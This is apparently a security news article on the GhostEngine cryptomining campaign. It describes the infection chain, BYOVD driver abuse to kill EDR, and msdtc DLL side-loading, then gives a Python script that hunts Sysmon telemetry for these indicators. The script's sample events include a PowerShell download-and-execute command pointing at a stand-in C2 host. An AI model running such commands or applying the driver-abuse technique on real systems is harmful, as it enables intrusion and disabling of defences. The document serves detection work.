The REF4578 cryptocurrency-mining campaign has been observed deploying a malicious payload called GhostEngine, which abuses legitimately signed but vulnerable kernel drivers to terminate security products before installing an XMRig miner.
Researchers have yet to attribute this sophisticated campaign to a known threat actor or to publish details about its targets and victims, so its origin remains unknown.
What a recent report does describe is the infection chain. The attack starts with the execution of a file named ‘Tiworker.exe,’ which masquerades as a legitimate Windows binary (the real TiWorker.exe is the Windows Modules Installer Worker). This executable is the initial-stage payload for GhostEngine: it runs a PowerShell script that downloads additional modules and executes commands on the compromised system.
Once Tiworker.exe runs, it downloads a PowerShell script named ‘get.png’ from the attacker’s command-and-control (C2) server; get.png is GhostEngine’s main loader. It installs and configures further modules, disables Windows Defender, enables remote services, and clears several Windows event logs.
Next, get.png checks that the system has at least 10 MB of free disk space before continuing the infection, then creates scheduled tasks named ‘OneDriveCloudSync,’ ‘DefaultBrowserUpdate,’ and ‘OneDriveCloudBackup’ to establish persistence. All three names are chosen to blend in with legitimate Microsoft and browser maintenance tasks.
In the final phase, the PowerShell script downloads and runs ‘smartsscreen.exe,’ GhostEngine’s main payload. This component terminates EDR processes, deletes their executables from disk, and then downloads and starts the XMRig cryptocurrency miner.
To disable EDR software, GhostEngine loads two vulnerable kernel drivers: aswArPots.sys (an Avast driver) is used to kill EDR processes, and IObitUnlockers.sys (an IObit driver) is used to delete the corresponding executables. Because both drivers carry valid vendor signatures, Driver Signature Enforcement does not stop them from loading; that is the point of the bring-your-own-vulnerable-driver (BYOVD) technique.
For additional persistence, the Windows ‘msdtc’ service (Distributed Transaction Coordinator) is made to load a DLL named ‘oci.dll.’ msdtc legitimately looks for a library of that name (the Oracle Call Interface client) when it starts, so placing an attacker-controlled oci.dll where the service will find it is a classic DLL side-loading technique. Once loaded, the DLL downloads a fresh copy of ‘get.png’ and installs the latest version of GhostEngine on the infected host.
Researchers recommend that defenders look for unusual PowerShell execution, unexpected process activity (for example a TiWorker.exe running from outside its normal location, or msdtc loading an unexpected oci.dll), and network traffic to known crypto-mining pools.
Because the drivers are legitimate signed binaries rather than malware in their own right, antivirus signatures alone will not catch them. The most aggressive way to stop this campaign is to block the creation of the vulnerable driver files themselves, aswArPots.sys and IObitUnlockers.sys, with an EDR file-creation rule, so the kernel-mode components can never be written to disk or loaded.
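As an added example (not code from the article or from the report it summarizes), the following Python triages Sysmon-style telemetry for the indicators described above: a Tiworker.exe running from outside WinSxS, PowerShell fetching get.png or running an encoded command, the three scheduled-task names, smartsscreen.exe, creation or loading of the two vulnerable drivers, msdtc loading oci.dll, and connections to mining-pool ports. The event-dict schema, the field names and the sample events are constructed here; the mining-pool port list and the assumption that the only legitimate TiWorker.exe runs from WinSxS are this example's, not the page's.

```python
"""Hunt Sysmon-style telemetry for the GhostEngine (REF4578) chain.

Added example, not code from the article or from the underlying report.
The event-dict schema, the field names and SAMPLE_EVENTS are constructed
here; the indicator values (file names, task names, the msdtc/oci.dll pair)
are the ones the article names.
"""
import re
from collections import Counter

# Indicators from the article; all comparisons are case-insensitive.
DRIVER_NAMES = {"aswarpots.sys", "iobitunlockers.sys"}
TASK_NAMES = {"onedrivecloudsync", "defaultbrowserupdate", "onedrivecloudbackup"}
MAIN_PAYLOAD = "smartsscreen.exe"
LOADER_RE = re.compile(r"get\.png", re.IGNORECASE)
# The real TiWorker.exe (Windows Modules Installer Worker) runs from WinSxS;
# a copy anywhere else is the masquerade the article describes.
TIWORKER_OK_PREFIX = "c:\\windows\\winsxs\\"
# Assumption: stratum ports commonly used by XMRig-style pools. Tune per network.
MINING_PORTS = {3333, 4444, 5555, 7777, 14444}
ENCODED_PS_RE = re.compile(r"(?i)\s-(e|ec|enc|encodedcommand)\s")


def _base(path):
    """Lower-cased final component of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_event(ev):
    """Return the indicator tags one event matches; [] means nothing fired.

    Tags look like 'driver:aswarpots.sys' so the prefix tells the analyst
    which stage of the chain the event belongs to.
    """
    hits = []
    kind = ev.get("type")
    image = ev.get("image", "")
    name = _base(image)
    if kind == "process_create":                   # Sysmon event 1
        cmd = ev.get("command_line", "")
        if name == "tiworker.exe" and not image.lower().startswith(TIWORKER_OK_PREFIX):
            hits.append("stage0:tiworker_outside_winsxs")
        if name == MAIN_PAYLOAD:
            hits.append(f"payload:{MAIN_PAYLOAD}")
        if name in ("powershell.exe", "pwsh.exe"):
            if LOADER_RE.search(cmd):
                hits.append("loader:get.png")
            if ENCODED_PS_RE.search(cmd):
                hits.append("powershell:encoded_command")
    elif kind == "driver_load" and name in DRIVER_NAMES:
        hits.append(f"driver:{name}")              # Sysmon event 6 (DriverLoad)
    elif kind == "file_create":                    # Sysmon event 11 (FileCreate)
        target = _base(ev.get("target", ""))
        if target in DRIVER_NAMES:
            hits.append(f"driver_dropped:{target}")
    elif kind == "image_load":                     # Sysmon event 7 (ImageLoad)
        if name == "msdtc.exe" and _base(ev.get("loaded", "")) == "oci.dll":
            hits.append("persistence:msdtc_oci.dll")
    elif kind == "task_create":                    # Security event 4698
        task = _base(ev.get("task", ""))
        if task in TASK_NAMES:
            hits.append(f"task:{task}")
    elif kind == "network" and ev.get("dst_port") in MINING_PORTS:
        hits.append(f"network:mining_port_{ev['dst_port']}")  # Sysmon event 3
    elif kind == "log_clear":                      # Security 1102 / System 104
        hits.append(f"defense_evasion:log_cleared_{ev.get('channel', 'unknown')}")
    return hits


def triage(events):
    """Tag every event; return ([(index, tags) that fired], Counter of stages)."""
    tagged = [(i, triage_event(ev)) for i, ev in enumerate(events)]
    fired = [(i, h) for i, h in tagged if h]
    stages = Counter(tag.split(":", 1)[0] for _, h in fired for tag in h)
    return fired, stages


# Constructed sample telemetry: the chain from the article plus two benign events.
SAMPLE_EVENTS = [
    {"type": "process_create", "image": r"C:\Windows\WinSxS\amd64_servicingstack\TiWorker.exe",
     "command_line": "TiWorker.exe -Embedding"},                                   # benign
    {"type": "process_create", "image": r"C:\Users\Public\Tiworker.exe", "command_line": "Tiworker.exe"},
    {"type": "process_create", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -c IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://c2.invalid/get.png')"},
    {"type": "task_create", "task": r"\OneDriveCloudSync"},
    {"type": "process_create", "image": r"C:\ProgramData\smartsscreen.exe", "command_line": "smartsscreen.exe"},
    {"type": "file_create", "image": r"C:\ProgramData\smartsscreen.exe", "target": r"C:\Windows\Temp\aswArPots.sys"},
    {"type": "driver_load", "image": r"C:\Windows\Temp\IObitUnlockers.sys"},
    {"type": "image_load", "image": r"C:\Windows\System32\msdtc.exe", "loaded": r"C:\Windows\System32\oci.dll"},
    {"type": "network", "image": r"C:\ProgramData\smartsscreen.exe", "dst_port": 3333},
    {"type": "network", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "dst_port": 443},  # benign
]

if __name__ == "__main__":
    fired, stages = triage(SAMPLE_EVENTS)
    for idx, tags in fired:
        print(f"event {idx}: {', '.join(tags)}")
    print("stages seen:", dict(stages))
```

Two design points worth noting. Matching Tiworker.exe by name alone would flood a SOC with alerts from the genuine Windows Modules Installer Worker, so the rule keys on the image path rather than the name; the same path-based approach (is msdtc.exe the one under System32, is oci.dll loaded from an unexpected directory) is how a production rule should be tightened further. The stage prefixes on the tags are deliberate: a host that shows `driver_dropped` and `task` together has progressed well past initial access, which is a different response priority than a single blocked download of get.png.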
